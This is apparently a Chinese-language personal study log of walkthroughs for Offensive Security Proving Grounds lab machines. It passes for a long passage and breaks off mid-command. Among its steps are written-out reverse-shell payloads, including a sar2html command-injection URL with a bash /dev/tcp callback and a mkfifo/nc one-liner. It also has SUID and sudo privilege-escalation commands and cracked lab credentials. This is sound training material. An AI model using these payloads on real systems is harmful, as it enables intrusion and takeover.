# Proving Ground Play 這是我對 Offensive Security Proving Grounds 機器的學習紀錄 有人看到ㄉ話就借給你看ㄅXD ## Easy ### Vegeta1 看起來80能進入 ![](https://i.imgur.com/98CLzcT.png) 掃路徑 可以看到蠻多可疑的東西 ![](https://i.imgur.com/uxUbfIP.png) 進robots.txt可以看到/find_me ![](https://i.imgur.com/jnzIKAd.png) 進去目錄能看到一個html ![](https://i.imgur.com/oviELFD.png) 再點進去發現什麼都沒有 但看原始碼的最下面有奇怪的東西 ![](https://i.imgur.com/D72kwHo.png) ![](https://i.imgur.com/P86OheV.png) 拿去base64 decode 2次以後可以拿到一個QR Code 內容是`Password : topshellv` ![](https://i.imgur.com/oKVYEdK.png) 但不知道為什麼我不管用什麼方式都枚舉不出下一步:( 所以只能去查Write up ????? 為什麼可以翻到b374k ![](https://i.imgur.com/7Q1KXRN.png) 翻了所有的字典檔都沒有 後來查到好像只能用作者自己在Github上的wordlist== ![](https://i.imgur.com/xXnsugU.png) b374k沒東西 但看原始碼能看到一個路徑 ![](https://i.imgur.com/Fa7CNCm.png) ![](https://i.imgur.com/ymJoQ1f.png) 連進去有一個hahahaha.wav ![](https://i.imgur.com/JrNxyTu.png) 載下來聽 發現是摩斯密碼 丟到解密網站上可以拿到訊息 `USER : TRUNKS PASSWORD : US3R<KN>S IN DOLLARS SYMBOL)` ![](https://i.imgur.com/RPqeMg7.png) Username是trunks 密碼感覺很奇怪(? 還是他的意思是說只有前面 後面只是說S是美元符號 試`U$3R` 但沒有成功 換成`u$3r`就過了(? ![](https://i.imgur.com/YCCDoH6.png) #### 提權 發現`.bash_history`有點肥 cat出來看到一條奇怪的東西 ![](https://i.imgur.com/oH37LeE.png) 但passwd沒有那東西QQ ![](https://i.imgur.com/ZKBeIar.png) NANI!! passwd居然可以寫 ![](https://i.imgur.com/ywA0EoK.png) 把預先做好的帳號丟進去後su就是root了 ![](https://i.imgur.com/Izxluwn.png) #### Proof local.txt `5379d252853d17ca5b8abbea630bf9ca` ![](https://i.imgur.com/LqL2iVE.png) proof.txt `372a9044f016c804c0a5e0bfcf3d6265` ![](https://i.imgur.com/Tz54dgG.png) ----- ### BBSCute 初始掃描可以看到有開一些奇怪的東西 ![](https://i.imgur.com/EdhZkZm.png) 對80掃下去會看到很多東西 連上index.php可以看到一個登入介面 CMS是CuteNews 2.1.2 ![](https://i.imgur.com/imPc8tj.png) ![](https://i.imgur.com/r9Lvqbk.png) 查了一下發現有RCE的exploit ![](https://i.imgur.com/Xq3ATMn.png) 直接拿來run 但會爛掉 看了一下exploit以後發現問題出在URL上 exploit上自己的URL前面有先加/CuteNews/ 但這台沒有 所以把這條去掉就能直接RCE了 ![](https://i.imgur.com/yX4C7LU.png) ![](https://i.imgur.com/lmR4t2Q.png) ![](https://i.imgur.com/eJK3C37.png) ![](https://i.imgur.com/oyXhDd7.png) 隨便打一個reverse shell回來 ![](https://i.imgur.com/dlNVPKO.png) #### 提權 可以在SUID的地方找到hping3 ![](https://i.imgur.com/2vLdAPB.png) 直接用hping3生成一個帶root的shell ![](https://i.imgur.com/kvHoaaw.png) #### Proof local.txt `73924563992114d5316d49ab2f08d541` ![](https://i.imgur.com/4yOqE5q.png) proof.txt `dc254656522ddd0d7404d3ffc5d3c520` ![](https://i.imgur.com/ZXffIKF.png) ----- ### FunboxRookie 掃一下 感覺是要從FTP上傳東西再到網站拿webshell(? ![](https://i.imgur.com/HtFoTSJ.png) 用anonymous連上去 沒有寫入的權限 ![](https://i.imgur.com/SPR69EA.png) 但拿FTP的版本去找exploit可以翻到有RCE的 ![](https://i.imgur.com/tPs652d.png) 但可惜不能用 ![](https://i.imgur.com/fjpWh6P.png) 嘗試把裡面的zip載下來看 發現可能是進入點 id_rsa包在有密碼的壓縮檔內 ![](https://i.imgur.com/Wp0Bn8q.png) 把所有的zip下載下來用zip2john取hash 發現有幾個是可以爆出密碼的 ![](https://i.imgur.com/1rEU2fT.png) ![](https://i.imgur.com/3InYMdq.png) cathrine連不上去 ![](https://i.imgur.com/8AQp50u.png) tom可以 但發現是在一個被限制的shell內 ![](https://i.imgur.com/VpdQvz0.png) ![](https://i.imgur.com/dbTJxTL.png) #### 提權 發現.mysql_history有點肥 ![](https://i.imgur.com/zf45Oo8.png) 貓他可以看到好像是tom的憑證的奇怪東西(? ![](https://i.imgur.com/nHWVj2h.png) 嘗試sudo 發現去掉040可以過驗證 而且sudo還能ALL 直接`sudo su`就是root了 ![](https://i.imgur.com/4hjB4Y5.png) #### Proof local.txt `63e4802a0c92e631b4755db78602e22a` ![](https://i.imgur.com/uHYnPWC.png) proof.txt `f720af6ecf3dbdb082e2bef3614a6262` ![](https://i.imgur.com/8H8BmAO.png) ----- ### SunsetDecoy 看起來是純web ![](https://i.imgur.com/TrrOGXE.png) 連上去能發現一個save.zip ![](https://i.imgur.com/zAcHs41.png) 載下來發現解壓縮需要密碼 ![](https://i.imgur.com/19GoCGP.png) zip2john取hash後再爆 直接噴密碼出來 ![](https://i.imgur.com/EhNKTyr.png) 可以看到有shadow 拿john炸能噴一個名字很長的使用者的密碼出來 ![](https://i.imgur.com/JfoYLl6.png) ![](https://i.imgur.com/WbOaGIz.png) 可以直接連上去 但發現又是被限制的shell ![](https://i.imgur.com/ogAXZQU.png) ![](https://i.imgur.com/8RhdYmT.png) 能用的東西不多 ~~而且這名字真的好麻煩~~ ![](https://i.imgur.com/tUsbHmP.png) #### 提權 最後發現在SSH後面加上一條指令才能繞過 `ssh 296640a3b825115a47b68fc44501c828@192.168.146.85 -t "bash -noprofile"` ![](https://i.imgur.com/xBab4ex.png) 在/home有一個很奇怪的ELF 執行以後會有很多種選項 ![](https://i.imgur.com/bvXA5iu.png) 因為之前做過一個linux AV的Local Privilege Escalation 所以看到這個AV scan感覺有點機會 把pspy64丟到對面的機器上 然後再選AV scan 可以看到是chkrootkit 0.49在掃 ![](https://i.imgur.com/c6Ku9y1.png) 可以找到一個exploit 跟之前HackTheBox的那台一樣 ![](https://i.imgur.com/z8wXq1y.png) 把reverse shell塞到/tmp/update加上執行權限後就能root了 ![](https://i.imgur.com/48pBRX0.png) #### Proof local.txt `1d79be2f9593b2439285da0953de4112` ![](https://i.imgur.com/jOD80ub.png) proof.txt `60c622311bc1d325d5ea006d709705f4` ![](https://i.imgur.com/FmSRg03.png) ----- ### Potato 應該是打Web ![](https://i.imgur.com/A7Ti4vN.png) 隨便掃一下路徑可以發現有奇怪的東西 ![](https://i.imgur.com/IZRw2gK.png) admin就單純的後台頁面 但弱憑證跟SQL Injection都不能用 ![](https://i.imgur.com/O6HwbnY.png) 在logs裡面有一些log 但幾乎都是沒什麼用的資訊 ![](https://i.imgur.com/tig5nwq.png) ![](https://i.imgur.com/pyuDvKL.png) ![](https://i.imgur.com/x5ZHT5Y.png) 全Port的掃瞄結果出來了 可以看到有服務開在2112 ![](https://i.imgur.com/J4U1tk5.png) 是ProFTPD 而且可以anonymous登入 ![](https://i.imgur.com/2TComRF.png) 把index.php.bak載下來 貓他可以看到php的內容 ![](https://i.imgur.com/sd7TTB9.png) ![](https://i.imgur.com/Ph9gt2A.png) 觀察一下 發現應該可以把password改成array來繞過登入 因為`strcmp(array(), "meow")`會等於NULL 所以這樣可以讓第二個判斷式=0 用Burp把封包攔下來 然後把password改成array 送出後就發現登入成功了 ![](https://i.imgur.com/zDWRx7g.png) ![](https://i.imgur.com/vVM2vka.png) 到管理介面裡面隨便逛了一下 發現Logs的頁面有LFI的漏洞 只要改一下送出封包的內容就能觸發 ![](https://i.imgur.com/rF5UGyB.png) ![](https://i.imgur.com/Ucc21uI.png) 在passwd的最下面看到一個有hash的使用者 拖回來用john炸一下就拿到憑證了 ![](https://i.imgur.com/hAd50oR.png) ![](https://i.imgur.com/FxBJ0z0.png) 可以直接登入 ![](https://i.imgur.com/HLqE3aq.png) #### 提權 `sudo -l`可以看到一個奇怪的檔案 可以call到notes裡面的東西 看起來會直接執行對應的執行檔 ![](https://i.imgur.com/vx0YfkZ.png) ![](https://i.imgur.com/s5KqzQb.png) ![](https://i.imgur.com/QmrqSXY.png) 因為他後面是星號 所以可以隨便加東西進去 直接在/tmp下塞一個reverse shell讓他執行就好了 ![](https://i.imgur.com/9imCbch.png) #### Proof local.txt `b57f9e8f2e09219fc0e9149439b0416f` ![](https://i.imgur.com/CtmlcC2.png) proof.txt `85056f8e37b28a3bc37fe1542463e698` ![](https://i.imgur.com/qq3gPSh.png) ----- ### Gaara 怎麼PG都是打Web ![](https://i.imgur.com/ZH9kac1.png) 不知道為什麼都枚舉不到路徑 直到用了directory-list-2.3-big.txt這個wordlist才找到 ![](https://i.imgur.com/gEQw0Ft.png) 拉到最下面可以看到三條路徑 打開以後都是一串長到吐的文章 到這邊線索就斷了 直到看了Write up才知道要在這堆文章中翻出一行encode過的文字 (這什麼垃圾設計== ![](https://i.imgur.com/JrdO7EO.png) ![](https://i.imgur.com/DgmHbFc.png) `curl http://192.168.203.142/iamGaara | grep -oE '\w+' | sort -u -f | more` ![](https://i.imgur.com/PtKwETQ.png) 拿CyberChef用base58解可以噴出一串憑證 ![](https://i.imgur.com/3D1OJC2.png) 但這個憑證是無效的 不過至少我們拿到了username 用hydra炸一下就噴出來了 ![](https://i.imgur.com/FZdHCBY.png) 成功登入 ![](https://i.imgur.com/OHy115J.png) #### 提權 進去以後跑linPEAS 可以看到gdb有SUID 直接查GTFOBins就能翻到生shell的指令 輸入就直接root了 ![](https://i.imgur.com/KwGSB84.png) ![](https://i.imgur.com/uUbDHwI.png) #### Proof local.txt `4e63c838b940d3a9476e7acde72b409f` ![](https://i.imgur.com/LTbyi0A.png) proof.txt `0aeda9dd270f8b39e99c463c1b0df05f` ![](https://i.imgur.com/ls2Ecdo.png) ----- ### Dawn 看起來是有兔子洞的機器 ![](https://i.imgur.com/w9jaa3Y.png) 掃路徑有logs 進去以後可以看到一堆log 能把management.log載下來 ![](https://i.imgur.com/JXLwVx5.png) ![](https://i.imgur.com/T9c71bl.png) 看了一下發現他好像會一直執行ITDEPT下的web-contorl檔案 ![](https://i.imgur.com/YNc3mZp.png) 連SMB看到有一個同名的目錄 連上後還有寫入的權限 ![](https://i.imgur.com/JKlhFvF.png) ![](https://i.imgur.com/guXtzMR.png) 直接把reverse shell塞到web-control裡面再丟上去就RCE了 ![](https://i.imgur.com/SM1fkyp.png) #### 提權 `sudo -l`發現可以NOPASSWD用`/usr/bin/sudo` 那就直接`sudo /usr/bin/sudo su`就是root了 ![](https://i.imgur.com/Www2xfC.png) #### Proof local.txt `a2cd252ff40aa6fba39eccd9191eb984` ![](https://i.imgur.com/4n0DjwB.png) proof.txt `68843a045474abaf4ada23ac1500c75e` ![](https://i.imgur.com/P7cxZ6u.png) ----- ### DC-1 看起來只能打Web? ![](https://i.imgur.com/TxWtKKM.png) 隨便掃一下 看到東西超多 80可能只是兔子洞 回頭看一下全Port的掃瞄發現有在50244開一個unknow ![](https://i.imgur.com/TL96KYa.png) ![](https://i.imgur.com/gAtZGmY.png) 針對這個50244下去掃一下可以看到是RPC(? 看來這個也沒用了QQ ![](https://i.imgur.com/j9Qc3It.png) 直接找Drupal 7的exploit 點進去第一個然後clone下來 ![](https://i.imgur.com/77pKxJS.png) 運行裡面的`drupa7-CVE-2018-7600.py`以後發現可以直接進行Code Execution 塞reverse shell的payload下去就RCE了 ![](https://i.imgur.com/m2rE9xy.png) #### 提權 跑linPEAS發現find有SUID 到GTFOBins查了一下有相關的提權 直接照做就是root了 `find . -exec /bin/sh \; -quit` ![](https://i.imgur.com/u6y92Ab.png) ![](https://i.imgur.com/ivxcVRo.png) ![](https://i.imgur.com/Ea2p7EO.png) #### Proof local.txt `7a6e3a131c6fccbef2f956eb6426edac` ![](https://i.imgur.com/U3f1NVk.png) proof.txt `8a9b0b3297b1e7226c638863be572dd0` ![](https://i.imgur.com/ZjfbUj0.png) ----- ### FunboxEasy 又是Web ![](https://i.imgur.com/qV0Caq6.png) 掃了一下路徑 發現有幾條奇怪的東西 對secret掃下去以後可以看到更多奇怪的東西 ![](https://i.imgur.com/gX7Ozlf.png) ![](https://i.imgur.com/ETB7jGp.png) 看了一下 都沒有什麼用 到store裡面可以用`admin:admin`登入管理介面 ![](https://i.imgur.com/rTONJAk.png) 但不知道怎麼RCE 查了一下有沒有exploit 發現一個 ![](https://i.imgur.com/GZONiBh.png) 運行以後發現能用 加一個reverse shell下去就直接RCE了 ![](https://i.imgur.com/QfmsH0n.png) #### 橫向提權 在`/home/tony`下可以發現一個叫`password.txt`的檔案 打開後發現是一坨憑證 可以用這個憑證`su tony` ![](https://i.imgur.com/Q76WMrn.png) ![](https://i.imgur.com/jZ52PDG.png) #### 垂直提權 `sudo -l`看到一堆東西 這根本隨便提 直接`sudo /usr/bin/pkexec /bin/sh`就是root了 ![](https://i.imgur.com/wLq7QjU.png) ![](https://i.imgur.com/IsOxRws.png) #### Proof local.txt `74395882813e93aeb6a422e6dfb0618b` ![](https://i.imgur.com/PjrCJ4r.png) proof.txt `93e8d166b41519f8859e66a83d7d497a` ![](https://i.imgur.com/tH3mDpw.png) ----- ### CyberSploit1 看起來還是Web ![](https://i.imgur.com/sO8dtgL.png) 拿dirsearch掃一下可以翻到一堆東西 ![](https://i.imgur.com/uvLalSr.png) 到robots上可以看到一串base64 解密以後發現是yt連結(? ![](https://i.imgur.com/yrGLyIC.png) ![](https://i.imgur.com/ZZp9StQ.png) ???酷 ![](https://i.imgur.com/PgKWSyu.png) 在初始頁面的原碼可以翻到一個username ![](https://i.imgur.com/69aOAJ9.png) 但之後一直沒有進展 查了Write up以後發現要把剛剛拿到的flag當密碼登入SSH 什麼垃圾設計== ![](https://i.imgur.com/rhlg1H0.png) #### 提權 跑linPEAS 發現可能可以打Kernel Exploit ![](https://i.imgur.com/qVEiZU9.png) 查了一下 是熟悉的37292.c 丟過去編譯後執行就是root了 ![](https://i.imgur.com/gz4Ydu8.png) ![](https://i.imgur.com/fpU46aA.png) #### Proof local.txt `4396508ea25ba0a5e4913b77d9881f48` ![](https://i.imgur.com/fBTWapt.png) proof.txt `6302baed564ff9c2a9c33cdab245d0ea` ![](https://i.imgur.com/IX5OwO4.png) ----- ### Katana 這台看起來比較酷一點 ![](https://i.imgur.com/bupUpx5.png) 感覺8088很可疑 先掃他路徑 看起來是進入點 ![](https://i.imgur.com/Kh6HtX9.png) `upload.html`看起來可以丟檔案上去 ![](https://i.imgur.com/tgdXi5A.png) 手寫一個webshlel上傳 會塞到某`/html/`下 感覺從根目錄就能訪問到 但他說要等一分鐘 ![](https://i.imgur.com/XDJaOE9.png) 等一分鐘後嘗試訪問根目錄+katana_shell.php 但看起來沒什麼效果 掃全Port多出來幾個比較奇怪的 再針對下去掃發現都是web server ![](https://i.imgur.com/8G9yKqr.png) ![](https://i.imgur.com/CaMtZHd.png) 突然想到有沒有可能是開不同的web server 然後其中一個是能訪問到剛剛丟的shell.php的 稍微試了一下 發現在8715的根目錄能訪問到剛剛丟的katana_shell.php ![](https://i.imgur.com/3Xe8YGf.png) #### 提權 跑linPEAS 發現python有setuid的cap ![](https://i.imgur.com/wfUTJpO.png) 用python生成UID=0的shell就是root了 `python -c "import os;os.setuid(0);os.system('/bin/bash')"` ![](https://i.imgur.com/YMSltsV.png) #### Proof local.txt `6096a9bb5e9e2e9f9e78aaf49dce1169` ![](https://i.imgur.com/t5kwDOV.png) proof.txt `c877ec593d8fe8b7833cb97184dec76a` ![](https://i.imgur.com/A5pwGOt.png) ----- ### PyExp 這台看起來蠻酷的 只有開3306(? ![](https://i.imgur.com/xy6Hlfm.png) 奇怪的1337是SSH ![](https://i.imgur.com/i75E42d.png) 第一條進入的路徑是用hydra爆MySQL的密碼出來 但因為太久了 為了節省時間所以放其他人的圖 ![](https://i.imgur.com/8LYHCjQ.png) 用`root:prettywoman`這組憑證可以登入MySQL ![](https://i.imgur.com/JEUgRas.png) 先找Schema_name data看起來很可疑 `SELECT schema_name FROM information_schema.schemata;` ![](https://i.imgur.com/mSpz7ts.png) 對他找下去可以翻到一個table `SELECT table_name FROM information_schema.tables WHERE table_schema='data';` ![](https://i.imgur.com/2rsY9i5.png) 翻column可以找到兩個東西 `SELECT column_name FROM information_schema.columns WHERE table_name='fernet';` ![](https://i.imgur.com/bZ9cQ2R.png) 最後找這兩個column可以翻到兩組神奇的東西 ![](https://i.imgur.com/ZV5FYB8.png) 把這兩組丟到 https://asecuritysite.com/encryption/ferdecode 就能得到一組憑證```lucy:wJ9`"Lemdv9[FEw-``` ![](https://i.imgur.com/zRZZGo7.png) 拿這組憑證可以登入剛剛的SSH ![](https://i.imgur.com/IkX7OsK.png) #### 提權 `sudo -l`發現可以用root執行`/opt/exp.py` 打開來看發現會把輸入的東西丟到一個叫`exec`的函數 [查了一下](https://clay-atlas.com/blog/2019/07/30/%E5%9C%A8-python-%E7%A8%8B%E5%BC%8F%E4%B8%AD%E5%8B%95%E6%85%8B%E5%9F%B7%E8%A1%8C%E7%A8%8B%E5%BC%8F%E7%A2%BC-%E4%BD%BF%E7%94%A8-exec-%E5%B0%87-string-%E8%AE%8A%E6%88%90%E7%A8%8B/)發現會把輸入當作程式碼執行 ![](https://i.imgur.com/RW87fHi.png) ![](https://i.imgur.com/dYW5hx0.png) 直接輸入`import os;os.system("/bin/bash")`就能拿到root的shell了 ![](https://i.imgur.com/99KEISK.png) #### Proof local.txt `b20eaf77ebaa3cff482908beba7bc672` ![](https://i.imgur.com/4yU7xCr.png) proof.txt `a77f41ed360e0c1d0db788d8f9d2612b` ![](https://i.imgur.com/jl9JVX7.png) ----- ### Sar 打Web ![](https://i.imgur.com/Qt2OC3S.png) 掃了一下路徑 感覺能用的東西蠻少的 ![](https://i.imgur.com/Ur3BneQ.png) robots.txt裡面有一行奇怪的東西 把它丟到路徑下可以進到一個奇怪的CMS sar2html 3.2.1 ![](https://i.imgur.com/7b5J0Wt.png) ![](https://i.imgur.com/DSljrD4.png) 隨便查一下可以查到一個exploit 裡面內容蠻少的 感覺像是Command Injection ![](https://i.imgur.com/z1qnjR4.png) ![](https://i.imgur.com/u9rxPEZ.png) 輸入以後可以看到多出來幾個東西 點開第一個可以發現輸入id有效 把id改成reverse shell就可以直接RCE了 ``` http://192.168.162.35/sar2HTML/index.php?plot=;bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.49.162%2F443%200%3E%261%27 ``` ![](https://i.imgur.com/YFHxfKV.png) #### 提權 發現Cron會執行`/var/www/html/finally.sh` ![](https://i.imgur.com/RexwCGy.png) 到目錄下看 可以看到`finally.sh`會執行`write.sh` 而且我們有對`write.sh`寫入的權限 ![](https://i.imgur.com/y5QXm75.png) 丟一個reverse shell進去 大概等一段時間就可以拿到root的shell了 ![](https://i.imgur.com/M4xXEu4.png) #### Proof local.txt `67330e8b480c61fe5613119db5c9a7d8` ![](https://i.imgur.com/bFkggTI.png) proof.txt `d86a65d198730217034a6d8202453ba4` ![](https://i.imgur.com/QS7fFB0.png) ----- ### SunsetNoontide 掃一下 只有IRC(? ![](https://i.imgur.com/g4ys67W.png) 好像有能用的exploit ![](https://i.imgur.com/gzK9hPu.png) 把檔案拖過來看一下原始碼 發現payload看起來只是在做Command Injection(? ![](https://i.imgur.com/jGIviGG.png) 直接nc上去丟Payload就RCE了 ![](https://i.imgur.com/mJY4DQY.png) #### 提權 發現不管怎樣都提不了權 直到查了Write up發現是`root:root` 欸不是== ![](https://i.imgur.com/J3pmWRL.png) #### Proof local.txt `808632a00ce9a2645ac0eabb58dfc5c8` ![](https://i.imgur.com/0KcnB4J.png) proof.txt `4d3fdcd15faca0c06b5b4947df32c485` ![](https://i.imgur.com/syyA6u5.png) ----- ### Shakabrah 是Web題 ![](https://i.imgur.com/p7q13rR.png) 一進去感覺就是要Command Injection 戳一個Payload就能RCE了 (這題有環境問題 只能用他指定的Payload戳Reverse shell) `;rm -f /tmp/x; mkfifo /tmp/x; /bin/sh -c "cat /tmp/x | /bin/sh -i 2>&1 | nc 192.168.49.173 80 > /tmp/x"` ![](https://i.imgur.com/We0odDV.png) ![](https://i.imgur.com/zpFKcO7.png) #### 提權 翻SUID文件找到一個奇怪的檔案 運行以後發現是vim ![](https://i.imgur.com/b6HnMnJ.png) ![](https://i.imgur.com/gEf4Hwl.png) 到GTFOBins上找SUID的提權就直接root了 但因為沒有python所以要用py3 ![](https://i.imgur.com/PyVKi0l.png) ![](https://i.imgur.com/vSGmvSS.png) #### Proof local.txt `f857a1b073bf4f504ff6d4ff8db81cc5` ![](https://i.imgur.com/icHhL7l.png) proof.txt `a7a335ff352dc977cb424287ba031808` ![](https://i.imgur.com/aAf8LeN.png) ----- ### Sumo 純Web(? ![](https://i.imgur.com/e9wPakj.png) 連上後不知道為什麼都枚舉不到東西 直到用了`cgis.txt`這個wordlist掃才掃到一個`test.cgi` ![](https://i.imgur.com/bz0ZGee.png) 嘗試看看直接戳ShellShock 用Burp把封包抓下來改User-Agent ![](https://i.imgur.com/DPMXY3r.png) 丟過去以後就成功RCE了 ![](https://i.imgur.com/LTYIUVp.png) #### 提權 跑linPEAS 看了這個Kernel的版本直接想到37292.c 查了一下 看來這次能用用看33589.c ![](https://i.imgur.com/iBaxxVV.png) ![](https://i.imgur.com/FJZWrLT.png) 把exploit丟過去 編譯爛掉 改一下PATH就能解決 但exploit執行還是爛掉 `export PATH=/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin` ![](https://i.imgur.com/cTwTeLh.png) 接下來把LSE上面的清單全部試一次都沒有用QQ 用searchsploit查Kernel Exploit 然後一個一個試 最後用`40839.c`成功提到root ![](https://i.imgur.com/leCetMi.png) ![](https://i.imgur.com/7fqaBMd.png) #### Proof local.txt `6da4f513dd3240ca085a12e5fc2d3dc2` ![](https://i.imgur.com/J2x4Vzh.png) proof.txt `728ffa7fe36c65259ba6d38d7886137c` ![](https://i.imgur.com/jH9t15e.png) ----- ### Seppuku 酷耶 好久沒有在PG的機器看到有開SMB的 ![](https://i.imgur.com/Qvg7HRS.png) 看起來什麼都沒開 ![](https://i.imgur.com/vxuiZiA.png) 打8088 先掃一下路徑 連上`index.php`發現看起來像是webshell 但登不進去 ![](https://i.imgur.com/qq6l34f.png) 掃全Port 發現有些沒掃清楚 指定掃下去發現還有其他的Service ![](https://i.imgur.com/zU39LHQ.png) ![](https://i.imgur.com/034UCBe.png) 對7601掃一下 發現很多奇怪的路徑 打開secret發現有passwd跟shadow 還有一個像wordlist的東西 跟一個hostname ![](https://i.imgur.com/o5jjfJT.png) ![](https://i.imgur.com/gPoZzA9.png) ![](https://i.imgur.com/0AlI9UC.png) ![](https://i.imgur.com/mXA6k30.png) 之後試了很多東西但都打不進去 直到把hostname當username來炸 終於找到進去的憑證== ![](https://i.imgur.com/q7zN33r.png) ![](https://i.imgur.com/gw51PiB.png) #### Escape shell 直接`bash`就逃掉了 ![](https://i.imgur.com/dQaYpbL.png) #### 橫向移動 samurai 在seppuku的家目錄下可以發現一個`.passwd` 可以直接升到samurai ![](https://i.imgur.com/576Ist0.png) #### 橫向移動 tanto 在翻`/var/www/html`的時候可以看到一個keys 感覺有點可疑 看了一下發現裡面有感覺像是id_rsa的東西 複製下來加600權限以後發現能連tanto ![](https://i.imgur.com/6QCZcpy.png) ![](https://i.imgur.com/gFiTkbR.png) #### 垂直提權 root 在samurai時`sudo -l`可以發現能執行tanto下的某檔案 但發現根本就沒有 所以自己塞一個`/bin/bash`到`/home/tanto/.cgi_bin/bin`裡面 執行就是root了 ![](https://i.imgur.com/1Gu2dFl.png) #### Proof local.txt `12204f383b9f6f2bc1015908e23fe352` ![](https://i.imgur.com/EqXGYtN.png) proof.txt `f98dad10ff6a19501fe7a792abb44c25` ![](https://i.imgur.com/mQRMyRG.png) ----- ### Monitoring 看起來是80 但389看起來也蠻可疑的 ![](https://i.imgur.com/CfyVbeG.png) 在`/nagiosxi`有一個登入介面 找一下預設的憑證 可以知道是`nagiosadmin` ![](https://i.imgur.com/DCWuk1J.png) https://www.ibm.com/docs/en/power8?topic=POWER8/p8ef9/p8ef9_ppim_nagios_userid.htm ![](https://i.imgur.com/yXYndyJ.png) 但預設的憑證無法登入 多試幾組就能進了 但好像進到一個奇怪的網頁`nagiosadmin:admin` 之後查了很多exploit都不能用 最後看了Write up後發現只能用Metasploit解 運行以後就直接是root了 ![](https://i.imgur.com/TdwUzam.png) ![](https://i.imgur.com/nahAhO1.png) #### Proof proof.txt `ae8272fc5e381dbe878429a770c97a45` ![](https://i.imgur.com/e9Fnuua.png) ----- ### Geisha 掃出來感覺兔子洞很多 ![](https://i.imgur.com/ZP5ewLL.png) 枚舉了一段時間後在7125翻到一個`/passwd` 載下來可以看到全部的使用者 ![](https://i.imgur.com/iXRojzZ.png) ![](https://i.imgur.com/s065Vp4.png) 裡面有一個使用者 直接拿hydra爆密碼出來`geisha:letmein` ![](https://i.imgur.com/f8THy2g.png) ![](https://i.imgur.com/RcczCeP.png) ![](https://i.imgur.com/9ZWXHUs.png) #### 提權 跑linPEAS可以看到SUID有base32 ![](https://i.imgur.com/lWQHdiA.png) 到GTFOBins查base32可以看到能任意讀檔 可以讀root的id_rsa ![](https://i.imgur.com/Cs779yw.png) ![](https://i.imgur.com/JNrtEGi.png) `chmod 600 id_rsa`以後可以直接連上去 ![](https://i.imgur.com/GiCtOPL.png) #### Proof local.txt `005adc32bd20cd3ac5ce49415e793197` ![](https://i.imgur.com/j49Hrol.png) proof.txt `7603b6bc4373f6944a68b13c5642d4ba` ![](https://i.imgur.com/pWVVig6.png) ----- ### InfosecPrep 掃一下發現開80跟33060 33060應該是MySQL 有點可疑 ![](https://i.imgur.com/ODaDH5E.png) ![](https://i.imgur.com/7TZ5cMl.png) 帶`-sC`下去掃能找到叫`/secret`的路徑 裡面是奇怪的base64 解碼後感覺是`id_rsa` 存下來 ![](https://i.imgur.com/41PlDI6.png) ![](https://i.imgur.com/9ybmTwN.png) ![](https://i.imgur.com/WyFCext.png) ![](https://i.imgur.com/0DXJyig.png) 主頁面有說裡面有一個使用者叫`oscp` 把`id_rsa`加600權限後SSH上去就可以拿到初始shell了 ![](https://i.imgur.com/qfC2Qo9.png) ![](https://i.imgur.com/thrS6Od.png) #### 提權 跑linPEAS發現bash有SUID 直接`bash -p`就是root了 ![](https://i.imgur.com/C5uA1mv.png) ![](https://i.imgur.com/XCEH6tm.png) #### Proof local.txt `2b6ba7b604966d0d114e50bdb0fe8b5c` ![](https://i.imgur.com/lG3idWX.png) proof.txt `1220b46928ede2add90023f958a3001f` ![](https://i.imgur.com/aop2oqi.png) ----- ### Inclusiveness 感覺21跟80很可疑 ![](https://i.imgur.com/Em5vRuW.png) FTP可以用anonymous連 裡面有一個叫pub的資料夾 可以寫入 ![](https://i.imgur.com/n9XQRVU.png) 掃一下路徑可以找到robots.txt 但連上去他會說你不是搜尋引擎 所以不給看 ![](https://i.imgur.com/SoHC7oK.png) ![](https://i.imgur.com/9dBWDih.png) 把User-Agent改成Googlebot就過了 可以看到有一個叫`/secret_information/`的路徑 ![](https://i.imgur.com/SZGjXCI.png) 連上後發現一個奇怪的網頁 有兩個可以點的東西 點english可以發現網址多一個奇怪的參數指向`en.php` ![](https://i.imgur.com/csr0VBJ.png) ![](https://i.imgur.com/ORGq1kU.png) 用curl戳LFI 發現能把passwd戳出來 可以找到tom這個user ![](https://i.imgur.com/7mDBTyd.png) ![](https://i.imgur.com/FjWfcCn.png) 突然想到剛剛FTP可以寫入 查一下vsftpd的預設路徑 發現是在`/var/ftp/` 直接LFI剛剛的`test.txt` 發現可以戳到 ![](https://i.imgur.com/GcBRlrU.png) ![](https://i.imgur.com/A8OPEE7.png) 寫一個webshell 丟過去以後LFI戳回來就RCE了 ![](https://i.imgur.com/mzKhPtb.png) #### 提權 跑linPEAS 可以找到一個奇怪的SUID檔案在`/home/tom` ![](https://i.imgur.com/dH6XjBk.png) 在那個目錄下可以翻到他程式的原始碼 可以看到是用whoami來確認自己是不是tom 但whoami是相對路徑不是絕對路徑 所以這邊可以做Path Hijacking ![](https://i.imgur.com/wBPMvnb.png) 先到`/tmp`下把`/bin/sh`塞到`whoami`裡面 然後加執行權限後執行rootshell 發現可以成功 但只能執行一次指令 輸出會丟到下面的you are: XXX 而且自己還是`www-data`的權限 ![](https://i.imgur.com/lTnbc3h.png) 嘗試如果`echo tom`的話能不能繞過限制 執行後發現可以繞過 但shell超級不穩定 所以額外再打一個reverse shell回來 ![](https://i.imgur.com/yuukx4R.png) ![](https://i.imgur.com/zRKEVi2.png) #### Proof local.txt `483886136c534eb32eb117458ee53b19` ![](https://i.imgur.com/gRdytaP.png) proof.txt `45a4e161be01169037297f1ed76023a2` ![](https://i.imgur.com/ZDzaa2U.png) ----- ### Lampiao 感覺1898超級可疑 ![](https://i.imgur.com/zO3GEBC.png) 掃一下是HTTP Server ![](https://i.imgur.com/F3X8W8D.png) 80好酷 感覺進入點可能不是這邊 ![](https://i.imgur.com/Qj1zuDe.png) 1898開著Drupal 7 利用這個資訊去找Exploit可以找到一個 ![](https://i.imgur.com/DxnMVVH.png) ![](https://i.imgur.com/dRAqdaY.png) 把它載下來直接run就拿到initial shell了 ![](https://i.imgur.com/D6NjQFo.png) #### 橫向提權 跑linPEAS可以看到一個密碼 裡面有一個叫tiago的使用者 直接su就變成他了`tiago:Virgulino` ![](https://i.imgur.com/JzQ36bv.png) ![](https://i.imgur.com/SDeL2by.png) #### 垂直提權 跑linPEAS可以看到是易受攻擊的Kernel 用searchsploit可以找到一大坨exploit ![](https://i.imgur.com/Ld3FT6f.png) ![](https://i.imgur.com/MxTwGjs.png) 載下來直接編譯的話會噴錯 改PATH可以解決 但還是噴錯 `export 